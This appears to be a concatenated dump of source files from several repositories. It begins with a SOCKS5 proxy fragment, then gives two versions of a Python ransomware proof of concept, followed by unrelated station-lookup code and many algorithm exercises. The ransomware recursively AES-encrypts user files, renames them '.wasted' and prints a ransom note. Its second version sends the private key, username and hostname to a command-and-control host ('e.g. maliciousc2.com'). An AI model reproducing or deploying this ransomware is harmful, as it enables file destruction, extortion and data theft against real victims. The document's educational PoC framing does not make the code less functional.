addr = socket.inet_ntoa(self.rfile.read(4))
elif addrtype == 3: # Domain name
addr = self.rfile.read(ord(sock.recv(1)[0]))
port = struct.unpack('>H', self.rfile.read(2))
reply = b"\x05\x00\x00\x01"
try:
if mode == 1: # 1. Tcp connect
remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
remote.connect((addr, port[0]))
print 'Tcp connect to', addr, port[0]
else:
reply = b"\x05\x07\x00\x01" # Command not supported
local = remote.getsockname()
reply += socket.inet_aton(local[0]) + struct.pack(">H", local[1])
except socket.error:
# Connection refused
reply = '\x05\x05\x00\x01\x00\x00\x00\x00\x00\x00'
sock.send(reply)
# 3. Transfering
if reply[1] == '\x00': # Success
if mode == 1: # 1. Tcp connect
self.handle_tcp(sock, remote)
except socket.error, exc:
print "Caught exception socket.error : %s" % exc
def main():
ThreadingTCPServer.allow_reuse_address = True
server = ThreadingTCPServer(('127.0.0.1', 1080), Socks5Server)
server.serve_forever()
if __name__ == '__main__':
main()
``` |
{
"source": "jimmy-ly00/Ransomeware-PoC",
"score": 3
} |
#### File: jimmy-ly00/Ransomeware-PoC/main.py
```python
from Crypto.PublicKey import RSA
from Crypto import Random
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util import Counter
import argparse
import os
import sys
import base64
import platform
import discover
import modify
# -----------------
# GLOBAL VARIABLES
# CHANGE IF NEEDED
# -----------------
# set to either: '128/192/256 bit plaintext key' or False
HARDCODED_KEY = b'+<KEY>' # AES 256-key used to encrypt files
SERVER_PUBLIC_RSA_KEY = '''-----BEGIN PUBLIC KEY-----
<KEY>
-----END PUBLIC KEY-----''' # Attacker's embedded public RSA key used to encrypt AES key
SERVER_PRIVATE_RSA_KEY = '''-----BEGIN RSA PRIVATE KEY-----
<KEY>''' # SHOULD NOT BE INCLUDED - only for decryptor purposes
extension = ".wasted" # Ransomware custom extension
def parse_args():
parser = argparse.ArgumentParser(description='Ransomware PoC')
parser.add_argument('-p', '--path', help='Absolute path to start encryption. If none specified, defaults to %%HOME%%/test_ransomware', action="store")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-e', '--encrypt', help='Enable encryption of files',
action='store_true')
group.add_argument('-d', '--decrypt', help='Enable decryption of encrypted files',
action='store_true')
return parser.parse_args()
def main():
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
# Force one click and comment out args above
# absolute_path = "None"
# encrypt = True
# decrypt = False
if absolute_path != 'None':
startdirs = [absolute_path]
else:
# Check OS
plt = platform.system()
if plt == "Linux" or plt == "Darwin":
startdirs = [os.environ['HOME'] + '/test_ransomware']
elif plt == "Windows":
startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
# Can also hardcode additional directories
# startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Documents',
# os.environ['USERPROFILE'] + '\\Music',
# os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Onedrive']
else:
print("Unidentified system")
exit(0)
# Encrypt AES key with attacker's embedded RSA public key
server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
encryptor = PKCS1_OAEP.new(server_key)
encrypted_key = encryptor.encrypt(HARDCODED_KEY)
encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
print("Encrypted key " + encrypted_key_b64 + "\n")
if encrypt:
print("[COMPANY_NAME]\n\n"
"YOUR NETWORK IS ENCRYPTED NOW\n\n"
"USE - TO GET THE PRICE FOR YOUR DATA\n\n"
"DO NOT GIVE THIS EMAIL TO 3RD PARTIES\n\n"
"DO NOT RENAME OR MOVE THE FILE\n\n"
"THE FILE IS ENCRYPTED WITH THE FOLLOWING KEY\n"
"[begin_key]\n{}\n[end_key]\n"
"KEEP IT\n".format(SERVER_PUBLIC_RSA_KEY))
key = HARDCODED_KEY
if decrypt:
# # RSA Decryption function - warning that private key is hardcoded for testing purposes
rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
decryptor = PKCS1_OAEP.new(rsa_key)
key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
# Create AES counter and AES cipher
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# Recursively go through folders and encrypt/decrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
if encrypt and not file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file + extension)
print("File changed from " + file + " to " + file + extension)
if decrypt and file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
file_original = os.path.splitext(file)[0]
os.rename(file, file_original)
print("File changed from " + file + " to " + file_original)
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
if __name__=="__main__":
main()
```
#### File: jimmy-ly00/Ransomeware-PoC/main_v2.py
```python
from Crypto.PublicKey import RSA
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Util import Counter
import argparse
import os
import sys
import base64
import platform
import getpass
import socket
import base64
import discover
import modify
from gui import mainwindow
# -----------------
# GLOBAL VARIABLES
# CHANGE IF NEEDED
# -----------------
HARDCODED_KEY = b'+<KEY>' # AES 256-key used to encrypt files
SERVER_PUBLIC_RSA_KEY = '''-----BEGIN PUBLIC KEY-----
<KEY>
-----END PUBLIC KEY-----''' # Attacker's embedded public RSA key used to encrypt AES key
SERVER_PRIVATE_RSA_KEY = '''-----BEGIN RSA PRIVATE KEY-----
<KEY>
-----END RSA PRIVATE KEY-----''' # SHOULD NOT BE INCLUDED - only for decryptor purposes
extension = ".wasted" # Ransomware custom extension
# Exfilitrate key to C2
host = '127.0.0.1' # e.g. maliciousc2.com
port = 443 # e.g. 443
def getlocalip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('8.8.8.8', 80))
return s.getsockname()[0]
def parse_args():
parser = argparse.ArgumentParser(description='Ransomware PoC')
parser.add_argument('-p', '--path', help='Absolute path to start encryption. If none specified, defaults to %%HOME%%/test_ransomware', action="store")
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('-e', '--encrypt', help='Enable encryption of files',
action='store_true')
group.add_argument('-d', '--decrypt', help='Enable decryption of encrypted files',
action='store_true')
return parser.parse_args()
def main():
if len(sys.argv) <= 1:
print('[*] Ransomware - PoC\n')
# banner()
print('Usage: python3 main_v2.py -h')
print('{} -h for help.'.format(sys.argv[0]))
exit(0)
# Parse arguments
args = parse_args()
encrypt = args.encrypt
decrypt = args.decrypt
absolute_path = str(args.path)
# Force one click and comment out args above
# absolute_path = "None"
# encrypt = True
# decrypt = False
if absolute_path != 'None':
startdirs = [absolute_path]
else:
# Check OS
plt = platform.system()
if plt == "Linux" or plt == "Darwin":
startdirs = [os.environ['HOME'] + '/test_ransomware']
elif plt == "Windows":
startdirs = [os.environ['USERPROFILE'] + '\\test_ransomware']
# Can also hardcode additional directories
# startdirs = [os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Documents',
# os.environ['USERPROFILE'] + '\\Music',
# os.environ['USERPROFILE'] + '\\Desktop',
# os.environ['USERPROFILE'] + '\\Onedrive']
else:
print("Unidentified system")
exit(0)
# Encrypt AES key with attacker's embedded RSA public key
server_key = RSA.importKey(SERVER_PUBLIC_RSA_KEY)
encryptor = PKCS1_OAEP.new(server_key)
encrypted_key = encryptor.encrypt(HARDCODED_KEY)
encrypted_key_b64 = base64.b64encode(encrypted_key).decode("ascii")
print("Encrypted key " + encrypted_key_b64 + "\n")
if encrypt:
key = HARDCODED_KEY
if decrypt:
# RSA Decryption function - warning that private key is hardcoded for testing purposes
rsa_key = RSA.importKey(SERVER_PRIVATE_RSA_KEY)
decryptor = PKCS1_OAEP.new(rsa_key)
key = decryptor.decrypt(base64.b64decode(encrypted_key_b64))
# Create AES counter and AES cipher
ctr = Counter.new(128)
crypt = AES.new(key, AES.MODE_CTR, counter=ctr)
# Recursively go through folders and encrypt/decrypt files
for currentDir in startdirs:
for file in discover.discoverFiles(currentDir):
if encrypt and not file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
os.rename(file, file + extension)
print("File changed from " + file + " to " + file + extension)
if decrypt and file.endswith(extension):
modify.modify_file_inplace(file, crypt.encrypt)
file_original = os.path.splitext(file)[0]
os.rename(file, file_original)
print("File changed from " + file + " to " + file_original)
if encrypt:
# Exfiltrate encrypted key to C2
def connector():
server = socket.socket(socket.AF_INET)
server.settimeout(10)
try:
# Send Key
server.connect((host, port))
msg = '%s$%s$%s$%s$%s$%s' % (
getlocalip(), platform.system(), SERVER_PRIVATE_RSA_KEY, SERVER_PUBLIC_RSA_KEY, getpass.getuser(), platform.node())
server.send(msg.encode('utf-8'))
# if plt == "Windows"
main = mainwindow(encrypted_key_b64)
main.mainloop()
except Exception as e:
# if plt == "Windows"
# Do not send key, encrypt anyway.
main = mainwindow(encrypted_key_b64)
main.mainloop()
pass
try:
connector()
except KeyboardInterrupt:
sys.exit(0)
# This wipes the key out of memory
# to avoid recovery by third party tools
for _ in range(100):
#key = random(32)
pass
if __name__=="__main__":
main()
``` |
{
"source": "jimmymadon/sbb-surprise",
"score": 3
} |
#### File: sbb-surprise/service/db_requests.py
```python
import pandas as pd
from random import randint
def get_id_by_location(location):
"""
:param location: name of the location
:return: result_id
-1 == location is not found
"""
result_id = -1
df = pd.read_csv("../train_stations_data.csv", sep=',')
for index, stop_name in enumerate(list(df.stop_name)):
if location == stop_name:
result_id = df.iloc[index].stop_id
return result_id
def get_location_by_id(id_):
"""
:param id_:
:return: result_location
"" == id is not found
"""
result_location = ""
df = pd.read_csv("../train_stations_data.csv", sep=',')
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
result_location = df.iloc[index].stop_name
return result_location
def get_coordinates_by_id(id_):
df = pd.read_csv("../train_stations_data.csv", sep=',')
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
return df.iloc[index].stop_lat, df.iloc[index].stop_lon
def get_picture_by_id(id_):
df = pd.read_csv("../station_pictures_data.csv", sep=',')
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
return df.iloc[index].images
class Event:
def __init__(self, stop_id, stop_name, event_name, description, categories, url):
self.stop_id = stop_id
self.stop_name = stop_name
self.event_name = event_name
self.description = description
self.categories = categories
self.url = url
def get_event_list_by_id(id_):
df = pd.read_csv("../events_description_df.csv", sep=',')
event_list = []
stop_name = list(df.stop_name)
event_name = list(df.event_name)
description = list(df.description)
categories = list(df.categories)
url = list(df.url)
for index, stop_id in enumerate(list(df.stop_id)):
if id_ == stop_id:
event_list.append(Event(stop_id, stop_name[index],
event_name[index], description[index],
categories[index], url[index]))
return event_list
def select_random_cities(quantity=5, file_name="../train_stations_data.csv"):
"""
:param quantity: number of cities
:return: random ids of cities
"""
result_id_list = []
df = pd.read_csv(file_name, sep=',')
for i in range(quantity):
rand_number = randint(0, df.shape[0] - 1)
result_id_list.append(df.iloc[rand_number].stop_id)
return result_id_list
``` |
{
"source": "jimmymalhan/code_master_platform",
"score": 3
} |
#### File: 2.leet_code/contest/Reduction Operations to Make the Array Elements Equal.py
```python
class Solution:
def reductionOperations(self, nums: List[int]) -> int:
nums.sort()
n = len(nums)
count = 0
for i in range(n - 1):
if nums[i] != nums[i + 1]:
count += n-1-i
return count
```
#### File: 3.algorithmic_expert/Graphs/1.depth_first_search.py
```python
class Node:
def __init__(self, name):
self.children = [] # list of children
self.name = name # name of node
def addChild(self, name):
self.children.append(Node(name)) # add child to list of children
return self # return self to allow chaining
# v - vertices | # e - edges
# O(v + e) time | O(v) space # v frames on call stack
def depthFirstSearch(self, array):
array.append(self.name) # adding root Node
for child in self.children: # looping for every object in children
child.depthFirstSearch(array) # calling recursively
return array
"""
Explanation:
def depthFirstSearch(self, array):
array.append(self.name) # Step - 1 start at rootNode and ADD - 'A' | Step - 4 append 'B'
for child in self.children: # Step - 2 go to 'B' | Step - 5 go to 'E'
child.depthFirstSearch(array)# Step - 3 call the stack in DFS for 'B' | step - 6 so on and so forth
return array
"""
# unit testing
if __name__ == '__main__':
root = Node('A')
root.addChild('B').addChild('C')
root.children[0].addChild('D')
root.children[0].children[0].addChild('E')
print(root.depthFirstSearch([]))
# ['A', 'B', 'D', 'E', 'C']
```
#### File: 3.algorithmic_expert/Strings/string_mainupulation.py
```python
# print(array[i]+array[i+1], end=' ') #3, 5, 7
#Ques 1-
# array = ([1,2],[3,4])
# # output = 1, 3, 2, 4
# newList = []
# for v in zip(*array):
# # (1, 3)
# # (2, 4)
# for n in v:
# # print(n)
# # 1
# # 3
# # 2
# # 4
# newList.append(n)
# print(newList)
# # print(', '.join([str(n) for v in zip(*array) for n in v]))
# x = ["apple", "banana", "cherry"]
# for idx,value in enumerate(x):
# print(idx, value)
# 0 apple
# 1 banana
# 2 cherry
# x = ["apple", "banana", "cherry"]
# for idx,value in enumerate(x, start=1):
# print(idx, value)
# 1 apple
# 2 banana
# 3 cherry
#anagram
# a = "abc"
# b = "acb"
# def Solution(a, b):
# if sorted(a) == sorted(b):
# return True
# else:
# return False
# print(Solution(a,b))
# or
# doc = "acccb"
# chara = "abccc"
# def Solution(doc, chara):
# for element in chara:
# if doc.count(element) > chara.count(element):
# return False
# return True
# print(Solution(doc,chara))
# string = "abcdcaf" - 7 elements
# for i in range(len(string)): # idx[0-6]
# # for j in range(len(string)): # idx[0-6] - 7 times
# for j in range(i, len(string)): # idx[0-6], [1-6], [2-6], [3-6], [4-6], [5,6],[6]
#######################
# count from list
#######################
# https://stackoverflow.com/questions/20510768/count-frequency-of-words-in-a-list-and-sort-by-frequency
# from collections import Counter
# words =["hello_world", "word", "b"]
# def Solution(words = None):
# # return dict((i, words.count(i)) for i in words) #{'hello world': 1, 'b': 2}
# # for i in words:
# # print(dict(i, words.count(i)))
# # # return Counter(words) # Counter({'b': 2, 'hello world': 1})
# dic = {}
# for i in words:
# dic[i] = dic.get(i, 0) + 1
# return dic # {'hello_world': 1}
# if __name__ == '__main__':
# print(Solution(words))
# string = "1921680"
# def Solution(string):
# # newList = []
# # for i in range(1, len(string)):
# # print(string[:i])
# return ([string[:i] for i in range(1,len(string))])
# # print([string[:i] for i in range(1,len(string))])
# # for j in range(len(array)):
# if __name__ == '__main__':
# # Solution(string)
# print(Solution(string))
```
#### File: code_master_platform/6.w3/dict.py
```python
# def main():
# givenDict = Dictionary({0: 10, 1: 20})
# givenDict.addKey()
# if __name__ == '__main__':
# main()
################################
# 3. Write a Python script to concatenate following dictionaries to create a new one. Go to the editor
# Sample Dictionary :
# dic1={1:10, 2:20}
# dic2={3:30, 4:40}
# dic3={5:50,6:60}
# Expected Result : {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
################################
# class Dictionary(object):
# def __init__(self, dic1: dict, dic2: dict, dic3: dict) -> None:
# self.dic1 = dic1
# self.dic2 = dic2
# self.dic3 = dic3
# def concatenate(self):
# # print(self.dic1)
# # print(self.dic2)
# # print(self.dic3)
# # method 1
# # self.dic1.update(self.dic2)
# # self.dic1.update(self.dic3)
# # return self.dic1
# # method 2
# return {**self.dic1, **self.dic2, **self.dic3}
# def main():
# givenDict = Dictionary({1:10, 2:20}, {3:30, 4:40}, {5:50,6:60})
# print(givenDict.concatenate())
# if __name__ == '__main__':
# main()
################################
# 4. Write a Python script to check whether a given key already exists in a dictionary
################################
# class Solution:
# def __init__(self, dictionary:dict()) -> None:
# self.dictionary = dictionary
# def check_key(self, key:int) -> bool:
# return key in self.dictionary
# def main():
# givenDict = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
# givenSolution = Solution(givenDict)
# print(givenSolution.check_key(5))
# if __name__ == '__main__':
# main()
################################
# 5. Write a Python program to iterate over dictionaries using for loops.
################################
# class Solution:
# def __init__(self, dictionary:dict()) -> None:
# self.dictionary = dictionary
# def iterate_dictionary(self):
# for key, value in self.dictionary.items():
# print(f'{key} : {value}')
# import unittest
# class Test(unittest.TestCase):
# def test_iterate_dictionary(self):
# givenDict = {1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
# givenSolution = Solution(givenDict)
# givenSolution.iterate_dictionary()
# def main():
# unittest.main()
# if __name__ == '__main__':
# main()
################################
# 6. Write a Python script to generate and print a dictionary that contains a number (between 1 and n) in the form (x, x*x). Go to the editor
# Sample Dictionary ( n = 5) :
# Expected Output : {1: 1, 2: 4, 3: 9, 4: 16, 5: 25}
################################
# class Solution:
# def __init__(self, n:int) -> None:
# self.n = n
# # method 1
# # def generate_dictionary(self):
# # for key, value in self.dictionary.items():
# # finalValue = key * key
# # print(f'{key} : {finalValue}')
# def generate_dictionary(self):
# return {x: x*x for x in range(1, self.n+1)}
# def print_dictionary(self):
# print(self.generate_dictionary())
# import unittest
# class Test(unittest.TestCase):
# def test_generate_dictionary(self):
# givenN = 5
# givenSolution = Solution(givenN)
# givenSolution.print_dictionary()
# def main():
# unittest.main()
# if __name__ == '__main__':
# main()
#################################
# 7. Write a Python script to print a dictionary where the keys are numbers between 1 and 15 (both included) and the values are square of keys.
#################################
# class Solution:
# def __init__(self, dictionary:dict()) -> None:
# self.dictionary = dictionary
# def print_dictionary(self):
# # method 1
# # for i in range(1, 16):
# # print(f'{i}' ':' f'{i*i}')
# # method 2
# # print({x: x*x for x in range(1, 16)})
# # method 3
# # print(f'{dict(zip(range(1, 16), [x*x for x in range(1, 16)]))}')
# # method 4
# # dictionary = {x: x*x for x in range(1, 16)}
# # print(dictionary)
# # method 5
# # d = dict()
# # for i in range(1, 16):
# # d[i] = i*i
# # print(d)
# def main():
# Solution({}).print_dictionary()
# if __name__ == '__main__':
# main()
#################################
# 8.
#################################
``` |
{
"source": "jimmymalhan/Coding_Interview_Questions_Python_algoexpert",
"score": 4
} |
#### File: 1.elements_of_programming/Ch - 5 Arrays Sol/5.1_ans.py
```python
RED, WHITE, BLUE = range(3)
def dutch_flag_partition1(pivot_index, A):
pivot = A[pivot_index] # fetch the value at pivot_index in A and save it to "pivot" variable
# First pass: group elements smaller than pivot
for i in range(len(A)):
# Look for smaller element.
for j in range(i + 1, len(A)):
if A[j] < pivot:
A[i], A[j] = A[j], A[i]
break
# Second pass: group elements larger than pivot.
for i in reversed(range(len(A))):
# Look for a larger element. Stop when we reach an element less
# than pivot, since first pass has moved them to start of A.
for j in reversed(range(i)):
if A[j] > pivot:
A[i], A[j] = A[j], A[i]
break
# Time complexity is O(1)
# Space complexity is O(n^2)
##########################################################################
# Improve time complexity
RED, WHITE, BLUE = range(3)
def dutch_flag_partition2(pivot_index, A):
pivot = A[pivot_index]
# First pass: group elements smaller than pivot.
smaller = 0
for i in range(len(A)):
if A[i] < pivot:
A[i], A[smaller] = A[smaller], A[i]
smaller += 1
# Second pass: group elements larger than pivot.
larger = len(A) - 1
for i in reversed(range(len(A))):
if A[i] < pivot:
break
elif A[i] > pivot:
A[i], A[larger] = A[larger], A[i]
larger -= 1
# Time complexity = O(n)
# Space complexity = O(1)
##########################################################################
# performs classficiation into elements less than, equal to,
# and greater than the pivot in a SINGLE PASS
# intally all elements are in unclassified
RED, WHITE, BLUE = range(3)
def dutch_flag_partition3(pivot_index, A):
pivot = A[pivot_index]
# Keep the following invariants during partioning:
# bottom group: A[smaller]
# middle group: A[smaller:equal]
# unclassified group: A[equal:larger]
# top group: A[larger:]
smaller, equal, larger = 0, 0, len(A)
# Keep iterating as ling as there is an unclassfied element.,
while equal < larger:
# A[equal] is the incoming unclassfied element
if A[equal] < pivot:
A[smaller], A[equal] = A[equal], A[smaller]
smaller, equal = smaller + 1, equal + 1
elif A[equal] == pivot:
equal += 1
else: # A[equal] > pivot
larger -= 1
A[equal], A[larger] = A[larger], A[equal]
# each iteration decreases the size of unclassfied by 1
# Time complexity = O(n)
# Space complexity = O(1)
```
#### File: 1.elements_of_programming/Ch - 5 Arrays Sol/5.3_ans.py
```python
def multiply(num1, num2):
sign = -1 if (num1[0] < 0) ^ (num2[0] < 0) else 1
num1[0], num2[0] = abs(num1[0]), abs (num2[0])
result = [0] * (len(num1)+ len(num2))
for i in reversed(range(len(num1))):
for j in reversed(range(len(num2))):
result[i + j + 1] += num1[i] * num2[j]
result[i + j] += result[i + j + 1] // 10
result[i + j + 1] %= 10
# remove the leading zeroes.
result = result[next((i for i, x in enumerate(result)
if x != 0), len(result)):] or [0]
return[sign * result[0] + result[1:]]
# There are m partial product, each with at most n + 1 digits. We perform O(1) operations on each digit in each
# partial product, so the
# time complexity = O(nm)
```
#### File: 1.elements_of_programming/Ch - 5 Arrays Sol/5.6_ans.py
```python
def buy_and_sell_stock_once(prices):
min_price_so_far, max_profit = float('inf'), 0.0
for price in prices:
max_profit = max(max_profit, price - min_price_so_far)
min_price_so_far = min(min_price_so_far, price)
return max_profit
# time complexity - O(n)
# space complexity - O(1)
# max method takes two or more argument or at iterable,
# For 2 arguments i.e max_profit and max_profit_sell_today,
# it returns the variable which would have maximum value
# LC = 0121.best_time_to_buy_and_sell_stock.py
```
#### File: 2.leet_code/Array/0121.best_time_to_buy_and_sell_stock.py
```python
price = [2,3,5,5,7,11,11,11,13]
def maxProfit(prices):
max_profit, min_price = 0, float('inf')
for price in prices:
min_price = min(min_price, price)
profit = price - min_price
max_profit = max(max_profit, profit)
return max_profit
print(maxProfit(price))
```
#### File: 2.leet_code/contest/2186. Minimum Number of Steps to Make Two Strings Anagram II.py
```python
import collections
class Solution:
def minSteps(self, s: str, t: str) -> int:
hashmap = {}
for char in s:
hashmap[char] = hashmap.get(char, 0) + 1 # get(char, 0) is the default value of hashmap[char]
for char in t:
hashmap[char] = hashmap.get(char, 0) - 1 # get(char, 0) is the default value of hashmap[char]
return sum(abs(v) for v in hashmap.values()) # sum(abs(v) for v in hashmap.values()) is the sum of all values in hashmap
print(Solution().minSteps("leetcode", "coats"))
```
#### File: 2.leet_code/contest/2187. Minimum Time to Complete Trips.py
```python
from typing import List
import itertools
class Solution:
def minimumTime(self, time: List[int], totalTrips: int) -> int:
ans, n = 0, len(time)
for person in itertools.combinations(range(n), totalTrips):
curr = 0
for i in person:
curr += time[i]
ans = min(ans, curr)
return ans
print(Solution().minimumTime([1,2,3], 5))
```
#### File: 2.leet_code/contest/Check if Numbers Are Ascending in a Sentence.py
```python
class Solution:
def __init__(self, s: str) -> bool:
self.s = s
def areNumbersAscending1(self):
letter = [int(i) for i in self.s.split() if i.isdigit()]
for i in range(len(letter)):
for j in range(i + 1, len(letter)):
if letter[i] >= letter[j]:
return False
return True
def areNumbersAscending2(self):
s = self.s.split(' ')
last = float('-inf')
for char in s:
if char.isnumeric():
if int(char) <= last:
return False
else:
last = int(char)
return True
def main():
givenArray1 = Solution("sunset is at 7 51 pm overnight lows will be in the low 50 and 60 s")
print(givenArray1.areNumbersAscending1())
givenArray2 = Solution("hello world 5 x 5")
print(givenArray2.areNumbersAscending1())
givenArray3 = Solution("36 claim 37 38 39 39 41 hire final 42 43 twist shift young 44 miss 45 46 sad 47 48 dig 49 50 green 51 train 52 broad 53")
print(givenArray3.areNumbersAscending1())
givenArray4 = Solution("sunset is at 7 51 pm overnight lows will be in the low 50 and 60 s")
print(givenArray4.areNumbersAscending2())
givenArray5 = Solution("hello world 5 x 5")
print(givenArray5.areNumbersAscending2())
givenArray5 = Solution("36 claim 37 38 39 39 41 hire final 42 43 twist shift young 44 miss 45 46 sad 47 48 dig 49 50 green 51 train 52 broad 53")
print(givenArray5.areNumbersAscending2())
if __name__ == '__main__':
main()
```
#### File: 2.leet_code/contest/Find Target Indices After Sorting Array.py
```python
from typing import List
class Solution:
def targetIndices(self, nums: List[int], target: int) -> List[int]:
sorted_nums = sorted(nums)
count = 0
result = []
for i in range(len(nums)): # loop through nums
if sorted_nums[i] == target:
result.append(count)
count += 1
return result
def main():
nums = [1,2,5,2,3]
target = 2
print(Solution().targetIndices(nums, target))
main()
```
#### File: 2.leet_code/contest/Minimum number of flips with rotation to make binary string alternating.py
```python
def MinimumFlips(s: str) -> int:
n = len(s)
a = [0] * n
for i in range(n):
a[i] = 1 if s[i] == '1' else 0
# Initialize prefix arrays to store
# number of changes required to put
# 1s at either even or odd position
oddone = [0] * (n + 1)
evenone = [0] * (n + 1)
for i in range(n):
# If i is odd
if(i % 2 != 0):
# Update the oddone
# and evenone count
if(a[i] == 1):
oddone[i + 1] = oddone[i] + 1
else:
oddone[i + 1] = oddone[i] + 0
if(a[i] == 0):
evenone[i + 1] = evenone[i] + 1
else:
evenone[i + 1] = evenone[i] + 0
# Else i is even
else:
# Update the oddone
# and evenone count
if (a[i] == 0):
oddone[i + 1] = oddone[i] + 1
else:
oddone[i + 1] = oddone[i] + 0
if (a[i] == 1):
evenone[i + 1] = evenone[i] + 1
else:
evenone[i + 1] = evenone[i] + 0
# Initialize minimum flips
minimum = min(oddone[n], evenone[n])
# Check if substring[0, i] is
# appended at end how many
# changes will be required
for i in range(n):
if(n % 2 != 0):
minimum = min(minimum, oddone[n] - oddone[i + 1] + evenone[i + 1])
minimum = min(minimum, evenone[n] - evenone[i + 1] + oddone[i + 1])
# Return minimum flips
return minimum
# Driver Code
# Given String
s = "000001100"
# Function call
print(MinimumFlips(s))
```
#### File: 2.leet_code/contest/Smallest Index With Equal Value.py
```python
class Solution:
def smallestEqual(self, nums):
for i in range(len(nums)):
if i % 10 == nums[i]:
return i
return -1
def smallestEqual2(self, nums):
for i, num in enumerate(nums):
if i % 10 == nums:
return i
return -1
def main():
nums = [4,3,2,1]
print(Solution().smallestEqual2(nums))
import unittest
class Test(unittest.TestCase):
def test1(self):
s = Solution()
self.assertEqual(s.smallestEqual([4,3,2,1]), 2)
print("Tests Passed!")
def test2(self):
s = Solution()
self.assertEqual(s.smallestEqual([4,3,2,1]), 2)
print("Tests Passed!")
if __name__ == "__main__":
unittest.main()
main()
```
#### File: 2.leet_code/contest/Two Furthest Houses With Different Colors.py
```python
from typing import List
class Solution:
def maxDistance(self, colors: List[int]) -> int:
ans = 0 # ans is the max distance between two houses with different colors
for i, x in enumerate(colors): # i is the index of the house, x is the color of the house
if x != colors[0]: ans = max(ans, i) # if the color of the house is not the same as the first house, then update the max distance
if x != colors[-1]: ans = max(ans, len(colors)-1-i) # if the color of the house is not the same as the last house, then update the max distance
return ans
def main():
colors = [1,1,1,6,1,1,1]
print(Solution().maxDistance(colors))
if __name__ == '__main__':
main()
```
#### File: 3.algorithmic_expert/Arrays/5.tournament_winner.py
```python
# loop through the competitions
# seperate home and away team
# define winning team -
# if the competition's element is winner based on the results
# update scores by 3 points
# find the best team in the scores
# optimization - create a new variable to track the winner element
# compare the current element's score with the winner element (in new variable) until finished
# O(n) time | O(k) space
# n - number of competitions or length of results (iteration)
# k - number of teams in the competitions (to store in DS - hash map)
Home_Team_Won = 1 # constant variable to make code the code more readable
def tournamentWinner(competitions, results):
currentBestTeam = ""
scores = {currentBestTeam: 0} # defined hashMap DS
for idx, competition in enumerate(competitions):
result = results[idx]
#print(results)
# [0, 0, 1]
# [0, 0, 1]
# [0, 0, 1]
# print(results[idx])
# 0
# 0
# 1
homeTeam, awayTeam = competition # splitting the array for homeTeam and awayTeam
# defining the winningTeam by checking the result is equal to Home_Team_Won
winningTeam = homeTeam if result == Home_Team_Won else awayTeam
# updating the winningTeam's scores in the DS
updateScores(winningTeam, 3, scores)
# update the current best team
if scores[winningTeam] > scores[currentBestTeam]:
currentBestTeam = winningTeam
return currentBestTeam
def updateScores(team, points, scores):
if team not in scores: # if the scores are not defined for the team
scores[team] = 0 # assigning that team's value to be zero
scores[team] += points # else - updating the team's points (by 3 as defined)
```
#### File: 3.algorithmic_expert/Arrays/6.squared_number.py
```python
# sortedSquares.sort()
# return sortedSquares
# def sortedSquaredArray(array):
# squaredList = []
# for item in array:
# squaredList.append(item * item)
# squaredList.sort()
# return squaredList
def sortedSquaredArray(array):
return (sorted(i ** 2 for i in array))
```
#### File: 3.algorithmic_expert/Arrays/8.smallest_difference.py
```python
def smallestDifference(arrayOne, arrayTwo):
arrayOne.sort(), arrayTwo.sort()
idxOne, idxTwo = 0, 0
smallest, current = float("inf"), float("inf") # keep track of the smallest difference and the current difference
smallestPair = []
while idxOne < len(arrayOne) and idxTwo < len(arrayTwo): # while both pointers are still in range of their arrays begining at the beginning of the arrays
firstNum, secondNum = arrayOne[idxOne], arrayTwo[idxTwo]
if firstNum < secondNum:
current = secondNum - firstNum # update current to the difference between the two numbers
idxOne += 1
elif secondNum < firstNum:
current = firstNum - secondNum
idxTwo += 1
else:
return [firstNum, secondNum] # if the numbers are equal, return the pair
if smallest > current:
smallest = current # update smallest to current
smallestPair = [firstNum, secondNum]
return smallestPair
print(smallestDifference([-1, 5, 10, 20, 28, 3], [26, 134, 135, 15, 17]))
```
#### File: Graphs/Matrix/4.River Sizes.py
```python
def riverSizes(matrix):
sizes = [] # holds the sizes of the rivers
visited = [[False for value in row] for row in matrix] # initializing visited as "2D matrix to False" - False for value in row and for row in matrix
# iterate through the matrix row by row and check if the element is 1 # if it is 1, add it to the queue # if it is 0, add it to the queue
for i in range(len(matrix)): # iterate through the rows
for j in range(len(matrix[i])): # iterate through the rows for i
if visited[i][j]: # if the node has been visited, continue or if visited[i][j] == True
continue
traverseNode(i, j, matrix, visited, sizes) # if the node has not been visited, traverse the node
return sizes
def traverseNode(i, j, matrix, visited, sizes): # i and j are rows
currentRiverSize = 0 # holds the size of the river
# depth first search # stack
nodesToExplore = [[i, j]] # holds the nodes to explore # stack
while len(nodesToExplore): # while there are nodes to explore
currentNode = nodesToExplore.pop() # pop the first node from the queue
i = currentNode[0] # get the row
